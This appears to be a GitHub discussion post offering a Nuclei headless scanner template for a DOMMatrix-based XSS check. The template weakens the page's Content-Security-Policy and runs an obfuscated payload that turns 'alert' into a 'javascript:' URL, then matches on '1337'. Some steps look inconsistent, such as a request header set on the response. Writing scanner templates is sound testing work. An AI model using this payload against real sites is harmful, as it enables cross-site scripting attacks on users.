### DISCUSSION TITLE
Dommatrix xss

### DISCUSSION THREAD

**Discussion by MR-pentestGuy** [projectdiscovery/nuclei-templates#2306] [General]
```yaml 
id: Dom-matrix-xss

info:
  name: Domatrix-xss
  author: MrpentestGuy
  severity: medium
  tags: headless

headless:
  - steps:
      - action: setheader
        args:
          part: response
          key: Content-Security-Policy
          value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
      - action: setheader
        args:
          part: response
          key: X-Frame-Options
          value: foo
      - action: setheader
        args:
          part: response
          key: If-None-Match
          value: foo
      - action: script
        args:
          hook: true
          code: |
            x=new DOMMatrix;
            matrix=alert;
            x.a=1337;
            location='javascript'+':'+x
      - args:
          url: "{{BaseURL}}"
        action: navigate
      - action: waitload
      - action: script
        name: alerts
        args:
          code: "location='javascript'+':'+x"
    matchers:
      - type: word
        part: alerts
        words:
          - "1337"
    extractors:
      - type: kval
        part: alerts
        kval:
          - alerts
```
